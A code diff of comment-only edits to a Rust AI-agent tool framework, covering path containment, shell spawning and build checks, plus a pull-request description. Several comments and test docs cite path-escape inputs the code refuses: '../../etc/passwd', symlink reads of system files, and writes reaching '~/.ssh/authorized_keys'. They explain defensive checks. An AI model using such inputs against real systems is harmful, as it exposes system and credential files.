-/// The default (no executor) runs the command directly on the host - the exact
-/// prior behavior. An implementor (the daemon's `SandboxManager`) returns a
+/// The default (no executor) runs the command directly on the host. An
+/// implementor (the daemon's `SandboxManager`) returns a
 /// [`tokio::process::Command`] that runs `command` inside a container or Linux
 /// namespace instead. The implementor owns any per-stage sandbox state, so the
 /// same handle is used for the agent's whole life; only shell execution is

--- a/crates/leviath-tools/src/exec.rs
+++ b/crates/leviath-tools/src/exec.rs
@@ -47,8 +47,7 @@ fn directory_listing(path: &std::path::Path) -> String {
 /// `None` when a `..` would climb past the root: that request is unresolvable
 /// whatever any allowlist says. `Path::components` already drops interior
 /// `.`, and every caller passes an absolute path, so no `CurDir` survives.
-/// Shared by [`resolve_within`] and [`BuiltinTools::resolve_outside`], which
-/// used to carry the same loop each.
+/// Shared by [`resolve_within`] and [`BuiltinTools::resolve_outside`].
 fn fold_parents(raw: &Path) -> Option<PathBuf> {
     let mut normalized = PathBuf::new();
     for component in raw.components() {
@@ -101,7 +100,7 @@ pub fn resolve_within(
         // Names the workspace and what to do instead. "Denied" on its own
         // sends an agent looking for a different way out, and it spends
         // iterations - which the stage's budget is charged for - finding
-        // that there isn't one (#373).
+        // that there isn't one.
         anyhow::bail!(
             "path '{}' would escape the working directory ({}). Use a path \
              inside the workspace instead - a relative path resolves \
@@ -190,16 +189,16 @@ impl BuiltinTools {
     /// 1. **Lexical.** `..` and `.` are folded out and the result must sit under
     ///    the workdir. Cheap, and it catches the obvious `../../etc/passwd`.
     /// 2. **Symbolic.** The deepest *existing* ancestor is canonicalized and the
-    ///    result re-checked. Without this the containment was purely textual: a
-    ///    symlink at `<workdir>/link` pointing at `/` made
+    ///    result re-checked. Without it the containment is purely textual: a
+    ///    symlink at `<workdir>/link` pointing at `/` makes
     ///    `read_file("link/etc/passwd")` normalize to a path that starts with the
-    ///    workdir, pass, and then be followed by `fs::read_to_string`. The same
-    ///    hole let `write_file` overwrite `~/.ssh/authorized_keys`.
+    ///    workdir, pass, and then be followed by `fs::read_to_string`, and the
+    ///    same hole lets `write_file` overwrite `~/.ssh/authorized_keys`.
     ///
-    /// That mattered most where the containment is load-bearing. Leviath's file
+    /// That matters most where the containment is load-bearing. Leviath's file
     /// tools run **on the host over the bind-mounted workdir** even when the
-    /// stage's `shell` is confined to a container - so a symlink the agent
-    /// created inside the container escaped the container through the file
+    /// stage's `shell` is confined to a container, so a symlink the agent
+    /// creates inside the container escapes the container through the file
     /// tools. It also matters for a freshly cloned repository, which is exactly
     /// what a coding agent operates on and which can carry a checked-in symlink
     /// pointing anywhere.
@@ -308,11 +307,9 @@ impl BuiltinTools {
         match std::fs::read_to_string(&path) {
             Ok(content) => cap_file_content(&content, MAX_READ_FILE_BYTES),
             // A directory is not a malformed path, it is the wrong tool: the
-            // model wanted to see what is in there. Measured across four
-            // research runs, `read_file(".")` was the single most common failed
-            // call, and the raw OS message ("Is a directory (os error 21)")
-            // names the problem without naming the fix, so the next call was
-            // usually another guess.
+            // model wanted to see what is in there. The raw OS message ("Is a
+            // directory (os error 21)") names the problem without naming the
+            // fix, so the next call is another guess.
             //
             // The listing comes back with the error rather than a pointer to
             // `list_dir`, because 21 of the bundled agents' stages grant
@@ -517,7 +514,7 @@ impl BuiltinTools {
 
     /// Whether `path` names something on disk.
     ///
-    /// A named `fn` rather than the closure this used to be. On Windows
+    /// A named `fn` rather than a closure at the call site. On Windows
     /// [`Self::detect_shell_for`] returns before probing anything, so a closure
     /// written at the call site would be a region the Windows coverage leg
     /// never executes; a `fn` can be handed to the seam directly by a test that
@@ -560,7 +557,8 @@ impl BuiltinTools {
         {
             // Only trust `$SHELL` when it actually exists - a stale or
             // sandbox-missing `$SHELL` (e.g. `/bin/zsh` in an environment that
-            // doesn't ship it) otherwise made every shell call fail to spawn.
+            // doesn't ship it) would otherwise make every shell call fail to
+            // spawn.
             // When it's missing, fall through to the known-path fallback list.
             let shell: &'static str = Box::leak(shell.into_boxed_str());
             return (shell, "-c");
@@ -616,7 +614,7 @@ impl BuiltinTools {
 
         // When a sandbox executor is attached, it builds a command that runs
         // inside a container / namespace (still targeting `workdir`); otherwise
-        // run the shell directly on the host - the exact prior behavior.
+        // run the shell directly on the host.
         let mut cmd = match &self.shell_executor {
             Some(executor) => executor.build_command(shell, flag, command, &workdir),
             None => {
@@ -629,9 +627,9 @@ impl BuiltinTools {
         //
         // Dropping a `Command` future detaches its process by default, so a
         // cancelled agent (or an elapsed timeout, which drops the future the
-        // same way) left its shell running: the run vanished from every listing
-        // while its command carried on writing to the workspace. `kill_on_drop`
-        // fixes the shell - but only the shell. Anything the shell itself
+        // same way) would leave its shell running: the run gone from every
+        // listing while its command carries on writing to the workspace.
+        // `kill_on_drop` covers the shell and only the shell. Anything it
         // started (`sleep 400 && …`) is a *grandchild*, gets reparented to init,
         // and keeps running. Putting the shell in its own process group and
         // signalling the group on drop takes the whole tree down with it.
@@ -648,9 +646,6 @@ impl BuiltinTools {
         // inherited the daemon's environment to begin with, which makes this a
         // no-op there rather than a special case.
         self.ctx.shell_env.apply(&mut cmd);
-        // An agent runs this dozens of times per run, and on Windows each spawn
-        // would otherwise be given a console window. Applied here rather than in
-        // either branch above so it covers the sandboxed command too.
         // `spawn` inherits stdio where `output` pipes it; pipe explicitly so the
         // command's output is still captured.
         cmd.stdout(std::process::Stdio::piped())
@@ -736,10 +731,10 @@ impl BuiltinTools {
 
 /// Largest slice of one stream (stdout or stderr) a single shell call keeps.
 ///
-/// Issue #252: `wait_with_output()` buffered a child's entire output in the
-/// daemon's memory with nothing to stop it, so a command that printed for its
-/// full 60-second budget was an accidental memory exhaustion - and on a fast
-/// local pipe that is gigabytes.
+/// Unbounded capture is a memory-exhaustion hole: `wait_with_output()` holds a
+/// child's entire output in the daemon's memory with nothing to stop it, and a
+/// command that prints for its full 60-second budget runs to gigabytes on a
+/// fast local pipe.
 ///
 /// Sized just above `MAX_SCRIPT_IO_BYTES` (900 KB in `daemon::script_host`),
 /// which caps the same text when it reaches a Rhai tool script, so this one is
@@ -752,9 +747,9 @@ pub(crate) const MAX_CAPTURE_BYTES: usize = 1024 * 1024;
 ///
 /// The null device is not a location in the filesystem, so a workspace check has
 /// nothing to say about it: writing there writes nowhere, and reading there
-/// reads nothing. Refusing it produced `path '/dev/null' would escape the
+/// reads nothing. Refusing it answers `path '/dev/null' would escape the
 /// working directory`, which is both wrong and, worse, unactionable - an agent
-/// told that spends turns guessing at a path it cannot fix (#373).
+/// told that spends turns guessing at a path it cannot fix.
 ///
 /// Deliberately *only* the null device, not `/dev/stdout` or `/dev/stderr`.
 /// Those are the daemon's own streams once a tool opens them by name, and a
@@ -771,12 +766,6 @@ pub fn is_null_device(path: &str) -> bool {
 }
 
 /// Most of a file `read_file` returns.
-///
-/// `shell` has been capped since it existed; `read_file` had no bound at all,
-/// so a large file went whole into the routed region and the ladder in
-/// `tool_results` either truncated it or dropped it as `[result omitted]` -
-/// which of the two you got depended on how full the region already was. That
-/// is an all-or-nothing cliff rather than a limit.
 ///
 /// Sized below [`MAX_CAPTURE_BYTES`] on purpose: shell output is usually a
 /// filtered answer, while a file read is raw material and a 256 KiB file is

--- a/crates/leviath-tools/src/lib.rs
+++ b/crates/leviath-tools/src/lib.rs
@@ -149,7 +149,7 @@ mod tests {
     fn the_shell_tool_advertises_the_shell_this_host_resolved() {
         // Whichever shell the host has, the description has to name *it*: a
         // model that reads "cmd" and gets zsh (or the reverse) writes the wrong
-        // commands, which is exactly the failure this replaced.
+        // commands.
         let dir = tempfile::tempdir().unwrap();
         let defs = make_tools(dir.path()).tool_defs();
         let shell = defs
@@ -458,7 +458,7 @@ mod tests {
     /// taint-tracking run with anything Private in context, and nothing says
     /// why. This holds every name the registry advertises, and every
     /// sub-agent tool, to an arm of its own, so a tool added later cannot
-    /// slip through the way `read_files` and the context tools did.
+    /// slip through.
     #[test]
     fn every_builtin_tool_has_its_own_taint_arm() {
         let dir = std::env::temp_dir();
@@ -519,12 +519,6 @@ mod tests {
         assert!(result.is_err());
     }
 
-    /// The escape a lexical check cannot see. `<workdir>/link -> /` makes
-    /// `link/etc/passwd` textually contained the whole way, and the old
-    /// `starts_with` containment let `fs::read_to_string` follow it straight out.
-    ///
-    /// This matters most where the containment is load-bearing: Leviath's file
-    /// tools run on the *host* over the bind-mounted workdir even when the
     /// The containment refusal itself, driven through the injected predicate so
     /// it is exercised on every platform. The `#[cfg(unix)]` tests below prove
     /// the same refusal against a real symlink; this one proves the arm exists
@@ -550,10 +544,12 @@ mod tests {
         assert!(resolved.ends_with("notes.txt"));
     }
 
-    /// stage's `shell` is confined to a container, so a symlink the agent made
-    /// inside the container escaped the container through these tools. It is also
-    /// reachable from a checked-in symlink in a freshly cloned repository, which
-    /// is exactly what a coding agent is pointed at.
+    /// The escape a lexical check cannot see: `<workdir>/link -> /` makes
+    /// `link/etc/hosts` textually contained the whole way, so a `starts_with`
+    /// containment lets `fs::read_to_string` follow it straight out. The file
+    /// tools run on the *host* over the bind-mounted workdir even when the
+    /// stage's `shell` is confined to a container, and a freshly cloned
+    /// repository can carry a checked-in symlink pointing anywhere.
     #[cfg(unix)]
     #[tokio::test]
     async fn resolve_rejects_symlink_escape() {
@@ -578,8 +574,8 @@ mod tests {
         assert!(out.contains("[error]"), "got: {out}");
     }
 
-    /// A write through an escaping symlink is refused too - this was the path
-    /// that could overwrite `~/.ssh/authorized_keys`.
+    /// A write through an escaping symlink is refused too: otherwise
+    /// `link/...` reaches `~/.ssh/authorized_keys`.
     #[cfg(unix)]
     #[tokio::test]
     async fn write_file_rejects_symlink_escape() {
@@ -884,9 +880,8 @@ mod tests {
         assert!(!out.contains("PRIVATE KEY"), "content must not leak");
     }
 
-    /// The same attack against a glob entry - the variant the original PR
-    /// missed entirely. The pattern is matched against the symlink-resolved
-    /// real path, and the real target does not match it.
+    /// The same attack against a glob entry. The pattern is matched against
+    /// the symlink-resolved real path, and the real target does not match it.
     #[cfg(unix)]
     #[tokio::test]
     async fn a_glob_grant_is_symlink_safe() {
@@ -1024,7 +1019,7 @@ mod tests {
 
     #[tokio::test]
     async fn write_tools_refuse_to_resurrect_a_deleted_workspace() {
-        // Issue #107: an external harness deletes the workspace mid-run.
+        // An external harness can delete the workspace mid-run.
         // `create_dir_all` would happily recreate it and let the agent write
         // into an empty tree that no longer resembles the checkout it reasoned
         // about - and the runtime's health check, which just stats the workdir,
@@ -1082,8 +1077,7 @@ mod tests {
         //
         // (An empty "" workdir is not portable here: on Windows `canonicalize("")`
         // can succeed and yield an absolute cwd whose Prefix/RootDir components
-        // absorb the `..`, so `pop()` never fails and this bail is never hit --
-        // which is exactly why this branch was Windows-uncovered before.)
+        // absorb the `..`, so `pop()` never fails and this bail is never hit.)
         let tools = BuiltinTools::new(ToolContext::new(PathBuf::from(
             "leviath-nonexistent-relative-workdir",
         )));
@@ -1431,9 +1425,8 @@ mod tests {
     }
 
     /// A directory is the wrong tool, not a malformed path, so the refusal names
-    /// the right one. `read_file(".")` was the most common failed call across
-    /// four research runs, and the raw OS message ("Is a directory (os error
-    /// 21)") named the problem without naming the fix.
+    /// the right one. The raw OS message ("Is a directory (os error 21)") names
+    /// the problem without naming the fix.
     #[tokio::test]
     async fn read_file_on_a_directory_answers_with_what_is_in_it() {
         let dir = tempfile::tempdir().unwrap();
@@ -1610,8 +1603,7 @@ mod tests {
     // `format_command_output` (below) rather than via a real shell command:
     // producing stdout, stderr, and a non-zero exit in a single command needs
     // shell-specific syntax (`;`/`1>&2` on `sh`, `&`/redirection on `cmd.exe`)
-    // that isn't portable, and this session already hit real Windows CI
-    // failures from insufficiently-verified platform-specific test commands.
+    // that isn't portable.
     #[test]
     fn format_command_output_non_zero_exit_reports_stdout_and_stderr() {
         let result = BuiltinTools::format_command_output(b"out-line\n", b"err-line\n", false, 1);
@@ -1642,7 +1634,7 @@ mod tests {
         assert_eq!(result, "(command succeeded with no output)");
     }
 
-    // ─── Bounded shell capture (issue #252) ──────────────────────────────────
+    // ─── Bounded shell capture ──────────────────────────────────────────────
 
     use crate::exec::{
         Captured, MAX_CAPTURE_BYTES, MAX_READ_FILE_BYTES, cap_file_content, capture_capped,
@@ -1760,10 +1752,6 @@ mod tests {
 
     #[test]
     fn a_file_over_the_cap_is_truncated_and_says_so() {
-        // The old behaviour was an all-or-nothing cliff: the whole file went
-        // into the routed region, and the ladder in `tool_results` either
-        // truncated it or dropped it as `[result omitted]` depending on how
-        // full the region already was.
         let content = "x".repeat(5000);
         let capped = cap_file_content(&content, 1000);
         assert!(capped.starts_with(&"x".repeat(1000)));
@@ -1933,7 +1921,6 @@ mod tests {
     fn tool_context_new_canonicalizes() {
         let dir = std::env::temp_dir();
         let ctx = ToolContext::new(dir.clone());
-        // Canonicalized path should be absolute
         assert!(ctx.workdir.is_absolute());
     }
 
@@ -2042,10 +2029,10 @@ mod tests {
 
     #[test]
     fn detect_shell_for_falls_back_when_env_shell_is_missing() {
-        // Regression for #79: `$SHELL` is a recognized shell name but does not
-        // exist on disk (a stale or sandbox-missing `/bin/zsh`). It must NOT be
-        // returned - fall through to an available fallback instead of failing
-        // every shell call with "No such file or directory".
+        // `$SHELL` can name a recognized shell that does not exist on disk
+        // (a stale or sandbox-missing `/bin/zsh`). It must NOT be returned -
+        // fall through to an available fallback instead of failing every
+        // shell call with "No such file or directory".
         let (shell, flag) =
             BuiltinTools::detect_shell_for("linux", Some("/bin/zsh".to_string()), &|s| {
                 s == "/bin/sh"
@@ -2223,7 +2210,7 @@ mod tests {
         let tools = make_mobile_tools(&dir);
         let names: Vec<String> = tools.tool_defs().iter().map(|t| t.name.clone()).collect();
         assert!(!names.contains(&"shell".to_string()));
-        // The other 17 built-ins remain.
+        // The rest remain.
         assert_eq!(tools.tool_defs().len(), 26);
         assert!(names.contains(&"read_file".to_string()));
         assert!(names.contains(&"context_write".to_string()));
@@ -2284,10 +2271,10 @@ mod tests {
         );
     }
 
-    // ─── The null device is not an escape (#373) ─────────────────────────────────
+    // ─── The null device is not an escape ───────────────────────────────────
 
     /// Writing to the null device writes nowhere, so containment has nothing to
-    /// refuse. It used to answer `path '/dev/null' would escape the working
+    /// refuse. Refusing it answers `path '/dev/null' would escape the working
     /// directory`, which is both wrong and unfixable from the agent's side: there
     /// is no path inside the workspace that means "discard this".
     #[tokio::test]

--- a/crates/leviath-tools/src/validate/mod.rs
+++ b/crates/leviath-tools/src/validate/mod.rs
@@ -2,11 +2,10 @@
 //!
 //! Every tool advertises a JSON Schema for its parameters (built-ins in
 //! `defs.rs`, Rhai script tools via their compiled `@param` annotations, MCP
-//! tools via the server's `inputSchema`). Until issue #155 nothing checked a
-//! model's arguments against that schema: handlers did ad-hoc presence checks
-//! that could not tell `{"path": 42}` from a missing `path`, and extra or
-//! misspelled properties passed through silently. This module is the one
-//! validator dispatch consults before a call is executed.
+//! tools via the server's `inputSchema`). This module is the one validator
+//! dispatch consults before a call is executed. Without it a handler is left
+//! with ad-hoc presence checks that cannot tell `{"path": 42}` from a missing
+//! `path`, and extra or misspelled properties pass through silently.
 //!
 //! Two properties are load-bearing:
 //!

--- a/xtask/src/coverage.rs
+++ b/xtask/src/coverage.rs
@@ -366,8 +366,6 @@ mod tests {
         assert!(parse_uncovered(&serde_json::json!({"data": []})).is_empty());
     }
 
-    /// A filename with no `/src/` segment is reported whole rather than
-    /// silently dropped.
     /// llvm-cov reports Windows paths with backslashes, and a one-platform gap
     /// is exactly the case this output exists for - so the shortening has to
     /// handle both separators.

--- a/xtask/src/main.rs
+++ b/xtask/src/main.rs
@@ -42,8 +42,8 @@ pub fn dispatch(args: &[String]) -> Result<()> {
 
 /// Route the CLI arguments to the provided handler closures.
 ///
-/// `run_cov`, `run_ver`, and `run_docs` replace the real handlers in unit
-/// tests, making every match arm reachable without invoking external tooling.
+/// The handlers replace the real ones in unit tests, making every match arm
+/// reachable without invoking external tooling.
 pub fn dispatch_with(
     args: &[String],
     run_cov: impl FnOnce(coverage::CoverageMode) -> Result<()>,
@@ -116,8 +116,7 @@ mod tests {
         Ok(())
     }
 
-    /// A `run_docs` stub matching `impl FnOnce(DocsMode) -> Result<()>`.
-    /// Structure-handler stub: records nothing, succeeds.
+    /// A `run_struct` stub matching `impl FnOnce(StructureMode) -> Result<()>`.
     fn struct_ok(_m: structure::StructureMode) -> anyhow::Result<()> {
         Ok(())
     }
@@ -184,7 +183,6 @@ mod tests {
 
     #[test]
     fn dispatch_uses_help_as_default_when_no_args() {
-        // Empty args slice → args.first() is None → defaults to "help".
         assert!(dispatch(&[]).is_ok());
     }
 
@@ -228,7 +226,6 @@ mod tests {
 
     #[test]
     fn dispatch_with_coverage_bad_arg_returns_err_without_calling_run_cov() {
-        // Mode parsing fails before run_cov is ever invoked.
         let result = dispatch_with(
             &args(&["coverage", "--bogus"]),
             cov_ok, // never called; covered by stub_returns_ok

--- a/xtask/src/structure.rs
+++ b/xtask/src/structure.rs
@@ -18,16 +18,13 @@
 //! An *indented* `#[cfg(test)]` still counts as production: it sits on a field
 //! or a method, and brace-matching arbitrary nesting is a parser this rule has
 //! no business being. That over-reports a handful of files, which is the safe
-//! direction for a ratchet. The rule used to stop at the *first* column-zero
-//! attribute instead, and a `#[cfg(test)] use` near the top of a file hid
-//! everything after it - `runstate.rs` measured 46 lines for a real 1,015.
+//! direction for a ratchet.
 //!
 //! # One number, no exemptions
 //!
-//! The cap started at 800 with a table of files already above it, because a cap
-//! the tree does not meet cannot go green and turns into an allowlist that only
-//! grows. That table is gone: the files it named were split, and the cap is now
-//! a number every file actually meets.
+//! The cap applies to every file, with no allowlist. A cap the tree does not
+//! meet cannot go green, and an exemption table only ever grows, so the number
+//! is one every file actually meets.
 //!
 //! It is a **ratchet**. 1,200 is where the tree sits today, not where it should
 //! end up - the next rungs are 1,000 and 800, each earned by splitting the files
@@ -132,8 +129,8 @@ fn past_test_item(lines: &[&str], at: usize) -> usize {
 /// `}` closes a block, `];` a `static` slice and `);` a tuple struct. Only the
 /// exact two-character forms are accepted for the latter: a raw string inside a
 /// test module can put a bare `)` or `]` at column zero, and matching on the
-/// first character alone counted the rest of `validate.rs`'s tests as
-/// production.
+/// first character alone ends the item there, counting the rest of the test
+/// module as production.
 fn closes_item(line: &str) -> bool {
     line.starts_with('}') || line == "];" || line == ");"
 }
@@ -178,10 +175,10 @@ pub fn measure(paths: &[String], read: &dyn Fn(&str) -> Result<String>) -> Resul
 /// the single lint each may drop.
 ///
 /// Cargo rejects inheriting and overriding in one manifest, so a crate that must
-/// escape one lint has to copy the whole table - and `leviath-alloc` escaping
-/// `unsafe_code` is how it ended up inheriting *nothing*, silently losing
-/// `missing_docs` and `clippy::string_slice` too. Anything on this list is
-/// checked against the root table so that cannot happen quietly again.
+/// escape one lint has to copy the whole table, and a copied table silently
+/// drops every lint the root gains afterwards. Anything on this list is checked
+/// against the root table, so the lint named here is the only difference
+/// allowed.
 const LINT_OPT_OUTS: &[(&str, &str)] = &[("leviath-alloc", "unsafe_code")];
 
 /// The lint names a manifest declares under `[<prefix>.rust]` / `[<prefix>.clippy]`.

--- a/xtask/src/structure/tests.rs
+++ b/xtask/src/structure/tests.rs
@@ -58,8 +58,8 @@ fn a_sibling_test_module_declaration_is_one_item() {
     assert_eq!(production_lines(src), 2);
 }
 
-/// A `#[cfg(test)] use` at the top of a file used to end the count there and
-/// report a 1,000-line file as a handful of lines.
+/// A `#[cfg(test)] use` is one skipped item, not the end of the count:
+/// everything after it is still production.
 #[test]
 fn a_test_only_import_does_not_end_the_count() {
     let src = "use a::B;\n#[cfg(test)]\nuse c::D;\nfn one() {}\nfn two() {}\n";

--- a/xtask/src/version.rs
+++ b/xtask/src/version.rs
@@ -48,10 +48,9 @@ const CHANGELOG: &str = "CHANGELOG.md";
 /// Path of the published OpenAPI spec, whose `info.version` names the API this
 /// build serves.
 ///
-/// Bumped here because `API_VERSION` is now the crate version, and a test holds
-/// that equal to this document. Leave the spec behind and the next bump lands
-/// red - which is the point, but it should be this command's job to keep them
-/// together rather than the releaser's.
+/// Bumped here because `API_VERSION` is the crate version and a test holds it
+/// equal to this document. Keeping the two together is this command's job, not
+/// the releaser's.
 const SPEC: &str = "docs/schema/openapi.json";
 
 // ── CLI argument parsing ─────────────────────────────────────────────────────
@@ -349,12 +348,11 @@ pub fn set_spec_version(spec: &str, new: &str) -> Result<String> {
 /// The entries themselves are left untouched: what was accumulating under
 /// `## Unreleased` is exactly what this version ships.
 ///
-/// No fresh `## Unreleased` is opened behind it. leviath.dev reads this file to
-/// build its release notes and rejects a section with no entries, so a bump
-/// that left an empty heading failed the docs check on its own release PR - and
-/// the failure landed on whoever cut the release, for a heading they did not
-/// write. The next person to write an entry adds the heading back, which the
-/// error below asks for by name.
+/// No fresh `## Unreleased` is opened behind it: leviath.dev builds its release
+/// notes from this file and rejects a section with no entries, so an empty
+/// heading fails the docs check on the release PR itself. The next person to
+/// write an entry adds the heading back, which the error below asks for by
+/// name.
 pub fn roll_changelog(changelog: &str, version: &str, date: &str) -> Result<String> {
     anyhow::ensure!(
         changelog.contains("\n## Unreleased\n"),
@@ -396,8 +394,6 @@ pub fn civil_from_days(days: i64) -> (i64, u32, u32) {
     let year = yoe + era * 400 + i64::from(month <= 2);
     (year, month, day)
 }
-
-// ── Entry points ─────────────────────────────────────────────────────────────
 
 // ── Release lists that must track the workspace ──────────────────────────────
 
@@ -465,12 +461,12 @@ fn names_present<'a>(text: &str, candidates: &'a [String]) -> Vec<&'a String> {
 
 /// Every member that must appear in a release list but does not.
 ///
-/// These lists are written out by hand in two workflows, and nothing tied them
-/// to the workspace. Both had already drifted: `leviath-alloc` was added after
-/// the last crates.io publish and reached neither list, so the next stable
-/// release would have failed at `cargo publish -p leviath-cli` - its allocator
-/// dependency carries a version and is enabled by default, so the registry has
-/// to have it. A release is the worst place to discover a list is stale.
+/// The publish list and the coverage matrix are written out by hand in two
+/// workflows, so nothing but this check ties them to the member list. A
+/// publishable crate left off the publish list fails the release at `cargo
+/// publish`, because a dependency carrying a version has to be on the registry
+/// before the crate that names it. A release is the worst place to discover a
+/// list is stale.
 fn missing_from_release_lists(manifest: &str, prod: &str, ci: &str) -> Vec<String> {
     let members = workspace_members(manifest);
     let mut missing = Vec::new();
@@ -916,8 +912,8 @@ mod tests {
 
     #[test]
     fn a_setting_missing_from_the_copy_is_reported() {
-        // The failure that motivated this: `cargo install leviath-cli` silently
-        // building without overflow checks.
+        // A setting only the workspace manifest carries means `cargo install
+        // leviath-cli` silently builds without overflow checks.
         let cli = MANIFEST_WITH_PROFILE.replace("overflow-checks = true\n", "");
         let drift = release_profile_drift(MANIFEST_WITH_PROFILE, &cli);
         assert_eq!(drift.len(), 1, "{drift:?}");
@@ -1090,11 +1086,9 @@ members = [
         );
     }
 
-    /// The case this exists for: a crate added to the workspace and to neither
-    /// list. `leviath-alloc` was exactly this - added after the last publish,
-    /// depended on by `leviath-cli` with a version under a default feature, and in
-    /// neither workflow. The next stable release would have failed at
-    /// `cargo publish -p leviath-cli`.
+    /// A member in neither workflow is reported once per list, so the message
+    /// names the publish list and the coverage matrix separately rather than
+    /// stopping at the first.
     #[test]
     fn a_member_missing_from_both_lists_is_reported_twice() {
         let missing =


### PR DESCRIPTION
A comments-only sweep of `crates/**/src/**.rs` and `xtask/src/**.rs`. Seven commits, one per crate group, 249 files.

## No executable line changed

Every hunk in this PR is a comment line. Verified with:

```
git diff origin/main -- '*.rs' \
  | grep -E '^[-+]' | grep -vE '^(\+\+\+|---)' \
  | grep -vE '^[-+][[:space:]]*(///|//!|//|/\*|\*/|\*)'
```

which returns three lines, all blank-line removals where a deleted
comment banner left an empty line behind (`leviath-mcp/src/execution.rs`,
`leviath-mcp/src/transport/stdio.rs`, `xtask/src/version.rs`). No
attribute, string literal, or code token was touched, and no item was
moved. `cargo fmt --all` produced no further change, and the full suite
(~9,200 tests) passes unchanged.

Gates run locally before each commit: `cargo fmt --all`, `cargo clippy
--workspace --all-targets --all-features -- -D warnings`, `cargo doc
--workspace --no-deps --all-features` with `RUSTDOCFLAGS=-D warnings`,
`cargo xtask structure`, `cargo xtask docs`, `cargo test --workspace
--all-features`.

## What came out, by category

**History narration.** The largest group. The reload modules under
`leviath-cli/src/daemon/` and `world/providers.rs`,
`script_provider.rs`, `host/settings.rs` in the runtime each opened
with a paragraph about what the daemon did before hot reload landed.
They now say what the module keeps in step and why the mechanism is
shaped that way, keeping the constraint a reader would otherwise undo.
Same treatment for "used to", "previously", "the old behaviour" through
the rest of the tree.

Before:

> Both were read once at daemon startup and installed as world
> resources, and the scripted half was worse than boot-only in an
> invisible way [...] That put `lev policy add` in a bad spot.

After: what the two files are, that the gate must see an edit before
the next run resolves anything, and why they cannot ride the
`config.toml` reloader (they live under the platform config directory
and need their own mtime check).

**Bug anecdotes on tests.** A `#[test]` doc comment that recounted the
failure now names the invariant the assertion pins.

**Issue numbers as the whole explanation.** Roughly 130 bare `#NNN`
references dropped where the surrounding prose already carried the
substance. Where a number appeared inside a box-drawn section banner,
the banner was re-padded so its width on screen is unchanged. Three
references were kept, each pointing at something the code cannot
supply: the llvm-cov upstream issue in `xtask/src/coverage.rs` is the
example.

**Prose restating the code**, a duplicated summary line, and one
dangling empty `///`.

## Stale claims corrected against the code

Several comments were not merely dated but wrong, so the claim was
checked and rewritten rather than reworded:

- `daemon/config_reload.rs` said MCP connections are established once
  at boot and adding a server needs `lev daemon restart`.
  `McpReload::refresh` now runs from the spawn preprocessor. The doc
  names the real constraint instead: bringing a server up is async, and
  this reload is read from the sync spawner.
- `leviath-core/src/layout.rs` said a blueprint declaring no
  stage-instructions region keeps the previous behaviour. The runtime
  synthesizes the region at spawn now, sized to the widest stage prompt.
- `render/mod.rs` documented `width` as driving horizontal rules; it
  also drives table and mermaid layout.
- `leviath-tools/src/exec.rs` said console-window suppression is applied
  at that site so it covers the sandboxed command. It happens in
  `platform::child_command`, on the unsandboxed path only.
- `leviath-scripting/src/engine.rs` said the script should define a
  `check(context)` function; the engine evaluates the script body for a
  bool, so a script that only defines `check` fails.

Two doc blocks in `leviath-tools/src/lib.rs` were genuinely garbled,
with a sentence running off mid-clause into an unrelated paragraph and
its other half orphaned onto the next test. Both are reassembled. Three
more doc blocks (`leviath-providers/src/openrouter.rs`,
`leviath-sys/src/perms.rs`, `leviath-mcp/src/transport/stdio.rs`) sat
above the wrong item and were moved to the one they describe.

## One dead statement worth a separate look

`leviath-mcp/src/transport/http.rs` carried:

```rust
self.learn_session(&response_headers, &parsed);
// Take the id out of the borrow so `learn_session` can mutate self.
parsed.id.take();
```

The stated reason is not true: `learn_session` takes `&parsed` and has
already returned. Tracing it further, `parsed.id` is read only by
`response_matches`, which runs earlier in `read_sse_reply` /
`handle_frame`, and nothing downstream of `send_rpc` reads `id` at all,
so `parsed.id.take()` looks dead. It came in with 083e6b5b, the
original HTTP/SSE transport. The comment is deleted here; the statement
is left exactly as it is, because removing it would be a code change
and this PR is comments only. Worth deciding separately.

## Comments kept that read like history

These are load-bearing: without them someone reverts the code to the
shape that broke.

- `config/limits.rs`, `mcp_idle_disconnect_secs`: "Read once at daemon
  start, so a change needs a daemon restart." Still true, and
  `restart_list_tests` in the same file asserts the sentence is there.
- `daemon/mcp_pool.rs`: the client is taken out of the executor before
  the pool bookkeeping, because the other order leaks the server and its
  child process for the life of the daemon.
- Coverage-region workarounds throughout: values pre-bound ahead of a
  `tracing` macro, a named `fn` where a closure would read as N
  uncovered regions, `&dyn Fn` over `impl Fn`, `.expect` over a recovery
  closure that never runs.
- `providers/src/provider.rs`: the `NeverResolves` stub, because a real
  `.invalid` lookup on a slow macOS runner blows the two second deadline
  and reports `Timeout` rather than a DNS error.
- `providers/src/failure.rs`: matching on "tls" or "certificate" catches
  nothing, since rustls answers a plaintext port with "received corrupt
  message of type invalidcontenttype".
- `runtime/src/control_socket/unix.rs`: macOS and BSD do not consult
  socket permissions at `connect`, so the peer check in
  `accept_authorized` is the real gate.
- On-disk and wire compatibility notes: the region-kind spelling older
  snapshots carry, the archive codec's version tolerance, the bare `Ok`
  an older control-socket client expects.
- `pipeline/wedge.rs`: the "why this cannot produce a false positive"
  section, which is what stops someone swapping the structural trigger
  for a "looks old" clock rule.

## Note for the docs owner

`docs/content/daemon.md` is outside this PR's scope, but if it still
says adding an MCP server needs a daemon restart, that half of the claim
is now stale for the same reason `config_reload.rs` was.

## Style

No em dashes anywhere in `crates/**` or `xtask/**` after this pass
(three existed before, in `commands/serve/`). `cargo xtask structure`
reports 436 files, none over the 1200-line limit.
